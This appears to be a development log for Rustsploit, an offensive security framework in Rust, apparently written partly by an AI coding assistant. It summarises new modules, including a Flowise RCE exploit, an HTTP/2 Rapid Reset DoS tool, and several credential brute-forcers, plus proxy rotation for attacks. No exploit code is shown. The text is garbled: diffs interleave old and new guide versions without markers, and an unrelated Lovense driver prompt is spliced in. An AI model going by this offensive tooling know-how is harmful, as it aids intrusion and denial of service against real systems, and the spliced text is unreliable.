# Basic API server on 0.0.0.0:8080./rustsploit --api --api-key my-secret-key# With hardening enabled (auto-rotate on >10 unique IPs)./rustsploit --api --api-key my-secret-key --harden# Custom interface and IP limit./rustsploit --api --api-key my-secret-key --harden --interface 127.0.0.1 --ip-limit 5# Custom port./rustsploit --api --api-key my-secret-key --interface 0.0.0.0:9000
Security features
API key authentication on all protected endpoints
IP tracking and monitoring
Automatic key rotation when suspicious activity is detected
Logging to both terminal and file for audit trails
IP limit enforcement with configurable thresholds
All IpTracker fields are used:
ip: Used in logging, status endpoint, and the new /api/ips endpoint
first_seen: Used in logging to show when IP was first detected, and in both endpoints
last_seen: Used in status and /api/ips endpoints
request_count: Used in logging and both endpoints
New endpoint added: /api/ips - Returns all tracked IP addresses with full details including all fields
Enhanced get_status endpoint: Now includes detailed IP tracking information with all fields from each IpTracker
Enhanced track_ip method: Now logs detailed information using all fields, including duration calculations
Added serde feature to chrono: Enables DateTime<Utc> serialization
All routes properly wired: The new /api/ips endpoint is added to the protected routes
The code should compile without any dead code warnings. All fields are actively used in:
Logging operations
API responses
Status reporting
IP tracking calculations
Added authorization rate limiting with the following features:
Rate limiting logic:
Tracks failed authentication attempts per IP
Blocks IPs for 30 seconds after 3 failed attempts
Automatically resets the counter after the block period expires
Resets the counter on successful authentication
New AuthFailureTracker struct:
ip: IP address being tracked
failed_attempts: Number of failed attempts
first_failure: Timestamp of first failure
blocked_until: Timestamp when block expires (if blocked)
Enhanced auth middleware:
Checks rate limit before processing authentication
Records failures when invalid keys are provided
Resets counter on successful authentication
Returns 429 Too Many Requests when blocked
Logging:
Logs all rate limit events to terminal and log file
Shows remaining block time
Tracks duration since first failure
New API endpoint:
GET /api/auth-failures - Returns all IPs with authentication failures and their status
Enhanced existing endpoints:
/api/ips now includes auth failure information for each IP
Updated Files
1. README.md
Added API Server Mode to the table of contents
Added REST API Server to highlights
Added an API Server Mode section with:
Starting the API server (cargo commands)
API flags table
All endpoints with curl examples
Security features (rate limiting, hardening, logging)
Example workflow
2. docs/readme.md (Developer Guide)
Added API Server Architecture to the table of contents
Updated code layout to include api.rs
Added an API Server Architecture section with:
Architecture overview
State management details
Authentication middleware explanation
Rate limiting and hardening mode details
Key components with code examples
API endpoints list
Logging information
CLI usage examples
Documentation Highlights
The docs now include:
Cargo commands for starting the API server
All available flags (--api, --api-key, --harden, --interface, --ip-limit)
Complete endpoint documentation with curl examples
Security features explanation (rate limiting, hardening, logging)
Architecture details for developers
Example workflows
Improving build.rs with better error handling, short name support, sorting, and other enhancements:
build.rs
Removing the unused import:
build.rs
Improvements
Error handling
Replaced .unwrap() with Result types
Clear error messages with context
Validates directory existence before processing
Short name support
Generates match arms for both short names (e.g., port_scanner) and full paths (e.g., scanners/port_scanner)
Matches the pattern used in the generated dispatcher files
Deterministic output
Sorts mappings and directory entries for consistent builds
Easier to review generated code in version control
Deduplication
Uses HashSet to avoid duplicate module registrations
Documentation
Added doc comments explaining the script's purpose and behavior
Regex
More flexible pattern that handles different parameter names (e.g., target, _target)
Code organization
Uses a vector of tuples to iterate over categories, reducing duplication
More maintainable structure
Verbose mode
Optional verbose warnings via RUSTSPLOIT_VERBOSE_BUILD environment variable
Reduces noise during normal builds
Better path handling
More robust path operations with proper error handling
Handles edge cases better
Output quality
Adds header comments to generated files
Includes documentation in generated code
Better formatted output
The build script is now more robust, maintainable, and feature-complete. It should handle edge cases better and provide clearer feedback during the build process.
ping_sweep.rs improvements
Progress reporting: real-time progress with percentage, hosts up count, and scan rate
Parallel TCP probing: ports are probed in parallel for better performance
Better ICMP detection: detects and uses the correct ping command (ping vs ping6, handles IPv6 with -6 flag)
Error handling: clearer error messages when ping commands are missing
Progress cleanup: clears progress line at completion for cleaner output
ssdp_msearch.rs improvements
Multiple search targets: supports upnp:rootdevice, ssdp:all, and custom ST values
Configurable timeout: user can set timeout (default 3 seconds)
Retry logic: configurable retries (default 1, max 10) with delays between attempts
Verbose mode: optional verbose output showing requests and detailed errors
Enhanced response parsing: extracts additional SSDP headers (ST, NT, Cache-Control, EXT)
Better error handling: proper error context and messages throughout
Larger buffer: increased from 2048 to 4096 bytes for larger SSDP responses
User-Agent header: adds RustSploit user-agent to requests
Better output formatting: improved response display with additional header information
Both modules now have:
Better error handling
More features and configurability
Improved performance
Better user experience with progress indicators and verbose modes
More robust cross-platform support
Created Files:
src/modules/exploits/flowise/cve_2025_59528_flowise_rce.rs - Main exploit module
src/modules/exploits/flowise/mod.rs - Module registration file
Updated src/modules/exploits/mod.rs - Added flowise module
Features:
Banner display - ASCII art banner matching the original Python version
Interactive prompts - Prompts for email, password, and command (like other modules)
Authentication - Login functionality with proper headers
RCE execution - Executes commands via the customMCP endpoint vulnerability
Error handling - Proper error handling with colored output
Cookie support - Uses reqwest's cookie store to maintain session
401 retry logic - Automatically retries with internal header if needed
Framework Integration:
The module is automatically detected by the framework's build script (build.rs) because it:
Exports pub async fn run(target: &str) -> Result<()>
Is located in src/modules/exploits/flowise/
Is registered in the mod.rs files
The module will be available as:
flowise/cve_2025_59528_flowise_rce (full path)
cve_2025_59528_flowise_rce (short name)
panos module
Added improvements from the new version:
Better error handling with Context for more informative error messages
Enhanced file reading that filters empty lines and comments (lines starting with #)
Colored output:
Yellow for testing/info messages
Green for vulnerable findings
Red for errors/not vulnerable
Cyan for headers and vulnerable URLs
Better feedback messages showing what's being tested
Summary statistics showing vulnerable count for batch scans
Proper error propagation with ? operator
Flowise RCE Module (CVE-2025-59528)
Location: src/modules/exploits/flowise/cve_2025_59528_flowise_rce.rs
Status: Fully implemented
Has pub async fn run(target: &str) -> Result<()> signature
Registered in src/modules/exploits/flowise/mod.rs
Listed in src/modules/exploits/mod.rs
Features:
Banner display
Interactive prompts (email, password, command)
Login functionality
RCE execution via customMCP endpoint
Error handling with colored output
Cookie-based session management
401 retry logic
Framework Integration:
Auto-discovered by build script
Available as: flowise/cve_2025_59528_flowise_rce or cve_2025_59528_flowise_rce
HTTP/2 Rapid Reset DoS Module (CVE-2023-44487)
Location: src/modules/exploits/http2/cve_2023_44487_http2_rapid_reset.rs
Status: Fully implemented
Has pub async fn run(target: &str) -> Result<()> signature
Registered in src/modules/exploits/http2/mod.rs
Listed in src/modules/exploits/mod.rs
Features:
Banner display with legal disclaimer
Interactive prompts (port, SSL, streams, delay, baseline)
Baseline test functionality
Rapid reset attack implementation
Vulnerability analysis with risk assessment
IPv6 support
SSL/TLS support via tokio-rustls
Error handling with colored output
Framework Integration:
Auto-discovered by build script
Available as: http2/cve_2023_44487_http2_rapid_reset or cve_2023_44487_http2_rapid_reset
Dependencies Added:
h2 = "0.3" - HTTP/2 protocol implementation
tokio-rustls = "0.24" - Async TLS support
http = "1.0" - HTTP types
Implementation status
Module structure:
Exported in src/modules/exploits/http2/mod.rs
Auto-discovered by the build script (registered as http2/cve_2023_44487_http2_rapid_reset)
Core functions:
banner() — displays module banner
normalize_host() — handles IPv6 address formatting
baseline_test() — performs baseline HTTP/2 requests (SSL and non-SSL)
rapid_reset_test() — performs the rapid reset attack test (SSL and non-SSL)
run() — main entry point with interactive prompts
Features:
SSL/TLS support with proper certificate handling
Non-SSL support for plain HTTP/2
Baseline testing before the attack
Rapid stream creation and reset
Vulnerability analysis with risk assessment
Interactive configuration (port, SSL, streams, delay)
Legal disclaimer and permission check
Fixes applied:
Fixed http version conflict (0.2 to match h2)
Added bytes dependency
Fixed type inference for handshake calls
Fixed send_request API usage
Fixed send_reset return type handling
Removed unused mut keywords
Consistent TLS configuration
Code quality:
No linter errors
No warnings
Proper error handling
Clean code structure
The module is ready to use. You can run it via:
Interactive shell: run exploits/http2/cve_2023_44487_http2_rapid_reset <target>
Or the short form: run http2/cve_2023_44487_http2_rapid_reset <target>
Updated packages
All dependencies now use version ranges (e.g., "0.12" instead of "0.12.15"), allowing Cargo to fetch the latest patch versions.
Kept compatible versions for:
h2 = "0.3" (upgrading to 0.4 would require http 1.0+ and code changes)
http = "0.2" (required by h2 0.3)
tokio-rustls = "0.24" (compatible with current setup)
Updated to latest ranges:
reqwest = "0.12" (was 0.12.15)
tokio = "1.44" (was 1.44.2)
clap = "4.5" (was 4.5.35)
rustls = "0.23" (was 0.23.26)
bytes = "1.0" (was 1.0)
And all other packages
Improved http_title_scanner to be more robust and flexible:
Added interactive workflow: collects initial target, optional comma-separated list, and/or file-based target list.
Lets you choose whether to probe HTTP, HTTPS, or both; validates choices and prompts for timeout, verbosity, and optional report saving.
Uses a shared reqwest client with user-agent, redirect limit, and configurable timeout; extracts titles via an improved regex, sanitizes output, and captures status/timing details.
Handles errors gracefully, prints concise or verbose output, and writes an optional timestamped report (http_title_scan_YYYYMMDD_HHMMSS.txt) with per-target results.
Removed dead code and ensured no unwrap panics on network paths.
Added input validation and sanitization to the API:
New validation helpers:
sanitize_for_log: strips CR/LF/tab and truncates long values before logging
validate_api_key_format: length and ASCII checks
validate_module_name: allows only expected forms (exploits|scanners|creds/... with safe chars)
validate_target: basic length, printable ASCII, trimmed, and injection-safe checks
Applied protections:
Middleware now rejects malformed API keys early
run_module validates module and target before dispatch; logs use sanitized values
All log messages are passed through sanitize_for_log to avoid log injection
#### api mode and bug fixes and new modules etc Latest end
Improved the telnet bruteforce module with safer inputs and sturdier execution:
Added guarded prompts for port, thread count, yes/no answers, and wordlist paths (loops until valid input, checks file existence). Blank or invalid inputs now fall back to sensible defaults or re-prompt instead of panicking.
Wordlists are trimmed and filtered, with explicit errors when the files are empty—preventing silent no-op bruteforcing.
Swapped the shared stop flag to an AtomicBool so workers react immediately when a credential is found while stop_on_success is enabled.
Counted queued combinations up front and log the total attempts for visibility.
Added a powerful raw brute-force option to the Telnet module:
Prompts now support programmatic password generation: answer “yes” to “Enable raw brute-force password generation?” to supply a character set (default a-zA-Z0-9) and a maximum length (bounded to 16).
Wordlists became optional when raw mode is on (leave the password wordlist blank to skip it); the module still accepts wordlists and can combine them with raw guesses.
Queue building now streams through a background generator thread that respects the shared stop_on_success flag (AtomicBool) and counts attempts via an AtomicUsize.
Improved input validation for ports, thread counts, yes/no answers, and file paths; empty lists now raise clear errors.
Logged attempt counts and status messages highlight usernames/passwords loaded and total credentials queued.
Credential Modules
Hardened the SSH brute-force runner with validated host normalization, atomic stop control, and a bounded async work queue so we no longer pile up tasks or contend on a mutex; workers now exit immediately once a hit is found while still honoring combo mode and verbose logging.
FTP Bruteforce Fixes
Swapped the shared stop flag to an Arc<AtomicBool> and tightened the worker loops so we stop queuing attempts immediately after a hit while still letting outstanding tasks exit cleanly under the semaphore cap.
Simplified throttling: we dropped the expensive system-polling loop and now rely on the semaphore for connection pressure, plus clearer panic logging in the join loop.
Extended try_ftp_login with a verbose toggle so noisy connection failures only print when requested, while still surfacing TLS fallbacks or critical errors.
Replaced the brute-force loop with a semaphore-guarded task queue so concurrency stays bounded, tasks bail fast once a hit is found, and DNS results are resolved once and reused across attempts.
Added shared header storage plus richer error messages that identify the target when RTSP replies are unexpected or connections fail.
Advanced headers are now shared via Arc, and the stop flag moved to AtomicBool so threads dont block on a mutex when cancelling runs.
RTSP Target Support Updates
Added centralized target normalization so the module now accepts domains, IPv4, IPv6 (with or without brackets), optional schemes, and inline RTSP paths; inferred paths are queued first in the brute-force list.
Introduced normalize_target_input to standardize host/port handling and trim any implicit path/query fragments before resolution.
No automated tests were run; consider a quick RTSP smoke test against known IPv4/IPv6 endpoints to confirm resolution and path detection behave as expected.
Introduced shared prompt utilities for ports, thread counts, yes/no answers, and wordlists so SMTP input handling now mirrors the other modules and gives consistent feedback on bad values.
Reworked the SMTP brute-force module to match our richer prompt UX and concurrency story: inputs are validated, wordlists must exist, and worker threads respect an AtomicBool stop flag while reporting loaded counts and draining the queue on success.
Added reusable helpers for SSH input validation—targets are normalized through DNS-safe bracket handling and wordlists must exist before continuing—so mis-typed hosts or files fail fast with actionable feedback.
Hardened the REPL inputs: we now cap command length, sanitize module paths, and refuse targets with whitespace/control chars so only vetted values reach the module runner and env vars.
Locked down proxy usage by deduplicating/truncating large lists before activation, making it harder to feed an unbounded or repeated proxy set into env vars.
Added explicit sanitizers for module paths/targets to block traversal attempts and exotic characters before they ever touch utils::module_exists or shared state.
Docker Setup Utility
Added scripts/setup_docker.py, a standalone interactive helper that:
Detects repo root, validates Docker/Docker Compose availability, and guides users through binding address selection (loopback, 0.0.0.0, detected LAN IP, or custom).
Prompts for API key (custom or securely generated), optional hardening toggle, and IP-limit.
Generates a multi-stage Dockerfile (docker/Dockerfile.api) matching the requested build/serve stages, a hardened entrypoint (docker/entrypoint.sh), a project-specific compose file (docker-compose.rustsploit.yml), and an environment file (.env.rustsploit-docker).
Optionally runs docker compose up -d --build to bring the API online with the chosen configuration.
Usage
From the repo root, run python3 scripts/setup_docker.py.
Follow the prompts to select interface, API key, and hardening settings.
Allow the script to generate files and (optionally) launch the Docker stack.
If you skip the final step, start the stack later with:
docker compose -f docker-compose.rustsploit.yml up -d --build
All new files are created only after confirmation when existing content is detected, preventing accidental overwrites.
Rebuilt scripts/setup_docker.py into a safer CLI/interactive hybrid:
Validates repo root, docker/dockercompose availability, and enforces printable API keys with optional random generation.
Adds flags (--bind, --port, --api-key, --generate-key, --enable-hardening, --disable-hardening, --ip-limit, --compose-cmd, --skip-up, --force, --non-interactive) so the tool can be scripted or used interactively.
Normalizes host/port selection (loopback, all interfaces, detected LAN, or custom) and applies strict parsing for non-interactive use.
Generates Dockerfile, entrypoint, Compose file, and env file with restricted permissions (.env written 0600), docker security options (no-new-privileges, tmpfs /tmp), and port bindings derived from user choices.
Supports BuildKit-enabled docker compose up -d --build, or skips launch when --skip-up is set.
Reworked run to drive a multi-target workflow: it now gathers sanitized targets from CLI, interactive prompts, or files, applies per-target ports (including ip:port forms), and iterates through them while reusing a single DNS query configuration.
Added robust parsing, validation, and de-duplication helpers for targets, with stop handling, file support, and strict host/port sanitization so mixed IPs/domains and custom ports are accepted safely.
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@@ -1,253 +1,341 @@
# 🛠️ Rustsploit Developer Guide
> Reference manual for maintainers and contributors. Covers the architecture, build-time module discovery, shell ergonomics, proxy plumbing, and authoring guidelines for exploits, scanners, and credential modules.
# 🛠️ Developer Documentation: RouterSploit-Rust Framework
> This document details the internal architecture, auto-dispatch system, proxy retry logic, and step-by-step guide to writing modules for the Rust rewrite of RouterSploit.
---
## Table of Contents
## 🧠 Framework Philosophy
1. [Project Overview](#project-overview)
2. [Code Layout](#code-layout)
3. [Build Pipeline & Module Discovery](#build-pipeline--module-discovery)
4. [Shell Architecture](#shell-architecture)
5. [Proxy Subsystem](#proxy-subsystem)
6. [Command-Line Interface](#command-line-interface)
7. [Authoring Modules](#authoring-modules)
8. [Credential Modules: Best Practices](#credential-modules-best-practices)
9. [Exploit Modules: Best Practices](#exploit-modules-best-practices)
10. [Utilities & Helpers](#utilities--helpers)
11. [Testing & QA](#testing--qa)
12. [Roadmap & Ideas](#roadmap--ideas)
RouterSploit-Rust is a modular, async-capable, Rust-based rewrite of RouterSploit. Each module is standalone, invoked via:
- 📟 CLI (`cargo run -- --command ...`)
- 🖥️ Shell (`rsf>` prompt)
Goals:
- 🔒 Safe-by-default
- 📦 Cleanly separated modules
- ⚡ Async concurrency
- 🌐 Proxy-aware execution
---
## Project Overview
## 🗂️ Directory Structure
Rustsploit is a Rust-first re-imagining of RouterSploit:
- Async-native (Tokio) for scalable brute forcing and network IO
- Auto-discovered modules categorized as `exploits`, `scanners`, and `creds`
- Interactive shell + CLI runner referencing the same dispatch layer
- Proxy-aware execution with run-time rotation, validation, and fallback logic
- IPv4/IPv6-friendly: target normalization happens uniformly
- Carefully colored, concise output designed for operators on remote consoles
---
## Code Layout
```text
rustsploit/
```
routersploit_rust/
├── Cargo.toml
├── build.rs # Generates dispatcher code by scanning src/modules
── src/
├── main.rs # Entry point, selects CLI or shell mode
├── cli.rs # Clap-based CLI parser and dispatcher
├── shell.rs # Interactive shell loop + UX helpers
├── commands/ # Dispatch glue for exploits/scanners/creds
│ ├── mod.rs
│ ├── exploit.rs
│ ├── exploit_gen.rs # build.rs output
│ ├── scanner.rs
│ ├── scanner_gen.rs # build.rs output
│ ├── creds.rs
│ └── creds_gen.rs # build.rs output
├── modules/ # Fully auto-discovered attack modules
│ ├── exploits/
│ ├── scanners/
── creds/
│ └── utils.rs # Shared helpers (proxy parsing, module lookup, etc.)
├── docs/
│ └── readme.md # This document
├── lists/
│ ├── readme.md # Wordlist + data file catalogue
│ ├── rtsp-paths.txt
│ └── rtsphead.txt
└── README.md # Product overview
├── build.rs
── src/
├── main.rs # Entrypoint
├── cli.rs # CLI argument parser
├── shell.rs # Interactive shell logic
├── commands/ # Module dispatch logic
│ ├── mod.rs
│ ├── scanner.rs
│ ├── scanner_gen.rs
│ ├── exploit.rs
│ ├── exploit_gen.rs
│ ├── creds_gen.rs
│ └── creds.rs
├── modules/ # All attack modules
│ ├── mod.rs
│ ├── exploits/
── scanners/
│ └── creds/
└── utils.rs # Common utilities
```
Key takeaway: modules are just Rust files under `src/modules/**`. Add `pub mod my_module;` in the local `mod.rs`, and the build script handles the rest.
---
## Build Pipeline & Module Discovery
## 🔗 Module System
1. **`build.rs` scan:** Before compilation, build.rs walks `src/modules` (depth-limited) looking for `.rs` files that are not `mod.rs`.
2. **Signature detection:** If a file exposes `pub async fn run(`, it is treated as a callable module.
3. **Name generation:** Both a *short name* (`ssh_bruteforce`) and *qualified path* (`creds/generic/ssh_bruteforce`) are registered.
4. **Dispatcher emission:** Three files (`exploit_gen.rs`, `scanner_gen.rs`, `creds_gen.rs`) are emitted with exhaustive `match` statements that map names → `use crate::modules::...::run`.
5. **Shell + CLI usage:** When users invoke `use exploits/foo` or `--module foo`, the dispatcher resolves the actual function.
Because the dispatcher is generated at build time, there is no manual registry drift as long as modules live in the right folder and export `run`.
---
## Shell Architecture
The shell lives in `src/shell.rs`. Highlights:
- **Context:** `ShellContext` stores `current_module`, `current_target`, the loaded `proxy_list`, and `proxy_enabled` boolean.
- **Prompt helpers:** Inline functions prompt for paths, yes/no decisions, timeouts, etc.
- **Shortcut parsing:** `split_command` + `resolve_command` normalize input (e.g., `f1 ssh`, `pon`, `ptest`) to canonical keys.
- **Command palette:** `render_help()` prints a colorized table for quick reference.
- **Proxy tests:** `proxy_test` command triggers async validation via utils.
- **Run pipeline:** On `run`/`go`, the shell enforces:
- Module selected
- Target set
- Proxy state respected (rotate until success or fallback direct)
- Environment variables (`ALL_PROXY`, `HTTP_PROXY`, `HTTPS_PROXY`) set/cleared per attempt
- **State reset:** On exit, nothing is persisted intentionally for OPSEC.
Extensions (tab completion, history) can be added by wrapping the loop with a line-editor crate, but are omitted today to keep dependencies minimal.
---
## Proxy Subsystem
Implemented in `utils.rs` and surfaced in the shell.
- **Loader:** `load_proxies_from_file` reads lists, normalizes schemes (defaulting to `http://`), validates host/port via `Url`, and tolerates comments or blank lines. Returns both valid entries and a list of parse errors (line number, reason).
- **Supported schemes:** `http`, `https`, `socks4`, `socks4a`, `socks5`, `socks5h`.
- **Tester:** `test_proxies` concurrently (Tokio) checks a user-chosen URL using `reqwest::Proxy::all`. Configurable timeout and max concurrency.
- **Result:** Working proxies are retained; failures are reported with the reason (connection refused, invalid cert, etc.).
- **Integration:** Shell invites the user to validate immediately after loading; `proxy_test` can also be used on demand.
Proxies are set globally via environment variables so both module HTTP requests and low-level sockets (if they honor `ALL_PROXY`) benefit.
---
## Command-Line Interface
`src/cli.rs` uses Clap to expose three commands:
- `--command exploit|scanner|creds`
- `--module <name>` (short or qualified, same mapping as the shell)
- `--target <host|IP>`
Example:
```bash
cargo run -- --command exploit --module heartbleed --target 203.0.113.12
```
If the module needs additional parameters, it can prompt interactively (e.g., brute-force modules ask for wordlists even in CLI mode). For automated pipelines, modules should provide sensible defaults or accept environment variables.
---
## Authoring Modules
Every module must export:
Each module is a Rust file with a required `run()` entry point:
```rust
pub async fn run(target: &str) -> anyhow::Result<()>
```
### Optional:
```rust
pub async fn run_interactive(target: &str) -> anyhow::Result<()> {
// internal prompts or logic
}
```
### Placement:
- Exploits: `src/modules/exploits/`
- Scanners: `src/modules/scanners/`
- Credentials: `src/modules/creds/`
Subfolders are supported:
- `exploits/routers/tplink.rs``tplink` or `routers/tplink`
- `scanners/http/title.rs``title` or `http/title`
---
## ✅ Adding a New Module
### 1. Create File
```rust
// src/modules/scanners/ftp_weak_login.rs
use anyhow::Result;
pub async fn run(target: &str) -> Result<()> {
// ...
run_interactive(target).await
}
pub async fn run_interactive(target: &str) -> Result<()> {
println!("[*] Checking FTP on {}", target);
Ok(())
}
```
Guidelines:
1. **Location:** choose one of `src/modules/{exploits,scanners,creds}`. Use subfolders for vendor families (e.g., `exploits/cisco/`).
2. **`mod.rs`:** add `pub mod your_module;` in the sibling `mod.rs`. Without this, the build script ignores the file.
3. **Async I/O:** prefer `reqwest`, `tokio::net`, `tokio::process`, etc. Synchronous blocking code should be wrapped with `tokio::task::spawn_blocking` where possible (see SSH module).
4. **Logging:** leverage `colored` for clarity, but keep messages short and actionable. Use `[+]`, `[-]`, `[!]`, `[*]` prefixes consistently.
5. **Error handling:** bubble up with context (`anyhow::Context`) so the shell/CLI surface meaningful errors.
6. **Wordlists / resources:** store under `lists/` and document them in `lists/readme.md`.
7. **Optional interactive mode:** If the module benefits from multiple code paths, optionally expose `run_interactive` and call it from `run`.
### Example skeleton
### 2. Register in `mod.rs`
```rust
use anyhow::{Context, Result};
pub async fn run(target: &str) -> Result<()> {
println!("[*] Checking {}", target);
let url = format!("http://{}/status", target);
let body = reqwest::get(&url)
.await
.with_context(|| format!("failed to reach {}", url))?
.text()
.await
.context("failed to fetch body")?;
if body.contains("vulnerable") {
println!("[+] {} appears vulnerable", target);
} else {
println!("[-] {} not vulnerable", target);
}
Ok(())
}
pub mod ftp_weak_login;
```
---
## Credential Modules: Best Practices
## 🧠 Auto-Dispatch System
Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP follow shared patterns:
The CLI/shell can call:
```bash
cargo run -- --command scanner --module ftp_weak_login --target 192.168.1.1
```
- **Input prompts:** ask for port, username/password wordlists, concurrency limit, stop-on-success toggle, output file, verbose logging.
- **Sanitation:** trim wordlist entries, skip blanks, provide early exits if lists are empty.
- **Concurrency:**
- Use `tokio::Semaphore` for asynchronous modules (FTP, SSH).
- Use `threadpool` + `crossbeam-channel` for synchronous protocols (Telnet, POP3, SMTP).
- **Adaptive throttling:** Some modules (FTP) sample CPU/RAM to avoid saturating the host.
- **TLS/STARTTLS:** Accept invalid certs for offensive tooling convenience, but note this clearly.
- **Result persistence:** Offer to write `host -> user:pass` pairs to a local file (in `./` by default).
- **IPv6:** Use helpers like `format_addr` to wrap IPv6 addresses in brackets and support port suffixes.
Or in the shell:
```
rsf> use scanners/ftp_weak_login
rsf> set target 192.168.1.1
rsf> run
```
Behind the scenes:
1. `build.rs` scans `src/modules/` recursively
2. Detects files with `pub async fn run(...)`
3. Generates:
- `exploit_dispatch.rs`
- `scanner_dispatch.rs`
- `creds_dispatch.rs`
4. Registers short + full names (e.g., `ftp_weak_login` + `scanners/ftp_weak_login`)
---
## Exploit Modules: Best Practices
## ❌ What Not To Do
- **CVE referencing:** mention CVE IDs and vendor/product in comments and output.
- **Artifact handling:** If the exploit downloads or writes files (e.g., Heartbleed dump), store them in the current working directory or a named subfolder.
- **Clean-up:** If credentials or accounts are added (Abus camera module), explain the impact and clean-up instructions in output or comments.
- **Safety checks:** Validate responses before declaring success; false positives hurt credibility.
- **Options:** Use `prompt_*` helpers (borrow from existing modules) if end-user input is needed (e.g., RTSP advanced headers, extra path lists).
- ❌ No `run()` → wont dispatch
- ❌ Dont name multiple functions `run()` in one file
- ❌ Dont use `mod.rs` as a module — ignored by generator
- ❌ Dont forget to update `mod.rs` when adding modules
---
## Utilities & Helpers
## ⚙️ CLI Usage
`src/utils.rs` provides:
```bash
cargo run -- --command exploit --module my_exploit --target 10.0.0.1
```
- `normalize_target`: wrap IPv6 addresses in brackets, pass through IPv4/hosts untouched.
- `module_exists` / `list_all_modules` / `find_modules`: used by shell to present module inventory.
- Proxy helpers described earlier (`load_proxies_from_file`, `test_proxies`, etc.).
### Args:
Feel free to expand this file with reusable pieces (e.g., credential loader, HTTP header templates) to avoid duplication inside modules.
- `--command`: exploit | scanner | creds
- `--module`: file name of module
- `--target`: IP or host
---
## Testing & QA
## 🖥️ Shell Usage
1. **Static checks:** `cargo fmt` and `cargo clippy` (where available).
2. **Build:** `cargo check` ensures new modules compile.
3. **Runtime smoke tests:**
- Shell: `cargo run``modules` → run a harmless module (e.g., `scanners/sample_scanner`).
- CLI: `cargo run -- --command scanner --module sample_scanner --target 127.0.0.1`.
4. **Proxy validation:** Load a mixed proxy file and confirm `proxy_test` filters entries correctly.
5. **Wordlists:** Validate that required lists exist (e.g., RTSP paths) and are referenced in docstrings.
```bash
cargo run
```
When adding new modules, include short usage documentation (stdout prints, README notes) so other operators know how to drive them.
Then:
```
rsf> help
rsf> modules
rsf> use scanners/ping_sweep
rsf> set target 192.168.0.1
rsf> run
```
Maintains internal state:
- `current_module`
- `current_target`
- `proxy_list`
- `proxy_enabled`
---
## Roadmap & Ideas
## 🔁 Proxy Retry Logic (Shell Only)
- Interactive shell improvements (history, tab completion, colored banners)
- Automated module testing harness (mock servers for POP3/SMTP/RTSP)
- Credential module templates (derive-style macros for common prompts)
- Integration with external wordlists (dynamic download or git submodules)
- Session logging (`tee` support) and output JSON export for pipeline ingestion
- Transport abstractions for UDP/DoS modules
Proxy logic only applies in shell mode (`rsf>`).
Contributions are welcome—open an issue or start a discussion before large refactors.
### Flow:
1. User types `run`
2. Shell checks:
- Module is selected?
- Target is set?
- Proxy enabled?
---
Happy hacking, and remember: **authorized testing only**. Commit messages and module descriptions should always reflect controlled research usage. !*** End Patch
### Case 1: Proxy ON, Proxies LOADED
- Create `HashSet<String>``tried_proxies`
- Loop:
- Pick random untried proxy
- Set `ALL_PROXY` using:
```rust
env::set_var("ALL_PROXY", proxy);
```
- Call `commands::run_module(...)`
- On success: stop
- On error: mark proxy as failed, try another
- If all proxies fail:
- Clear proxy env:
```rust
env::remove_var("ALL_PROXY");
```
- Try once directly
---
### Case 2: Proxy ON, No Proxies Loaded
- Show warning
- Clear `ALL_PROXY`
- Run once directly
---
### Case 3: Proxy OFF
- Clear proxy vars
- Run module once
---
### Summary Flow:
```
If proxy_enabled:
while untried proxies:
pick → set env → run → if fail → mark tried
if none work → clear env → try direct
else:
clear env → try direct
```
---
## 🧪 Module Execution Flow
Whether via CLI or shell:
1. `commands::run_module(...)`
2. Determines type: `exploit`, `scanner`, or `cred`
3. Calls correct dispatcher
4. Dispatcher calls `run(target).await`
5. Output shown to user
---
## 🛑 Error Handling
- All modules must return `anyhow::Result<()>`
- Errors are caught and shown cleanly in CLI or shell
---
## ⚡ Async Features
- Entire framework is powered by `tokio`
- All I/O modules are `async`
- Use `tokio::spawn`, `FuturesUnordered`, etc. for concurrency
---
## 📡 Making Requests
Use `reqwest`:
```rust
let resp = reqwest::get(&url).await?.text().await?;
```
Or with client:
```rust
let client = reqwest::Client::new();
let resp = client.post(&url).json(&data).send().await?;
```
✅ All requests respect `ALL_PROXY`
---
## 🧪 Example Use Cases
### CLI
```bash
cargo run -- --command creds --module ftp_weak_login --target 192.168.1.100
```
### Shell
```bash
rsf> use creds/ftp_weak_login
rsf> set target 192.168.1.100
rsf> run
```
---
## 🧼 Shell Reset
No session data persists. When restarted, shell forgets all settings — no saved targets or modules (by design).
---
## 🔐 Adapting CVEs
To build a real-world exploit:
- Convert PoC to async Rust logic
- Validate by checking known response headers/content
- Place it in the right folder and wire `run()`
TCP/UDP logic:
```rust
use tokio::net::{TcpStream, UdpSocket};
```
---
## 💡 Feature Roadmap
add more exploits etc
---
## 👥 Contributors
- **Main Developer**: me.
- **Language**: 100% Rust.
- **Inspired by**: RouterSploit, Metasploit, pwntools.
Would you like this exported as a `DEVELOPER_GUIDE.md` file now? I can generate it for you in exact GitHub-flavored markdown.
+4
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@@ -61,6 +61,10 @@ Here is the original module that needs to be refactored:
gemini
You are a senior Rust developer specializing in cross-platform, asynchronous hardware drivers. Your assignment is to develop a complete, production-grade Lovense device driver for Linux, written in Rust, using only information from official Lovense documentation and protocol references.
Strict Requirements:
+1 -33
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@@ -1,33 +1 @@
# 📚 Rustsploit Data Files
This directory contains reference lists and helper payloads consumed by modules under `src/modules/**`. Keep this README up to date whenever a new list is added so operators understand the expected format and typical usage.
---
## Available Files
| File | Used By | Description |
|------|---------|-------------|
| `rtsp-paths.txt` | `creds/generic/rtsp_bruteforce_advanced.rs` | Candidate RTSP paths to brute force when enumerating stream URLs (e.g., `/live.sdp`, `/Streaming/channels/101`). One entry per line; comments can be added with `#` at the start of a line. |
| `rtsphead.txt` | `creds/generic/rtsp_bruteforce_advanced.rs` | Optional RTSP header templates. When the user enables “advanced headers,” the module loads this file and injects each header line into outbound requests. Keep headers in `Key: Value` form. |
---
## Contributing Lists
1. **Naming:** Use lowercase and hyphens (`my-new-list.txt`) to remain compatible across platforms.
2. **Format:** Prefer plain UTF-8 text. Comment lines should start with `#` or `//` so loaders can skip them.
3. **Documentation:** Update this README with a row describing the file, the consuming module, and expected contents.
4. **Usage in modules:** Reference lists with relative paths or prompt the user for the filename. Most modules expect the user to supply the path (allowing custom lists), but shipping defaults in this directory helps bootstrap new users.
5. **Attribution:** If a list leverages community sources (e.g., SecLists), note that in the table and ensure licenses permit redistribution.
---
## Ideas for Future Lists
- `ftp-default-creds.txt` for anonymous login checks
- `telnet-banners.txt` to fingerprint devices before brute forcing
- `http-admin-panels.txt` for web interface discovery scanners
- Vendor-specific RTSP or ONVIF endpoint lists
Pull requests welcome—please include both the data file and an entry here. !*** End Patch
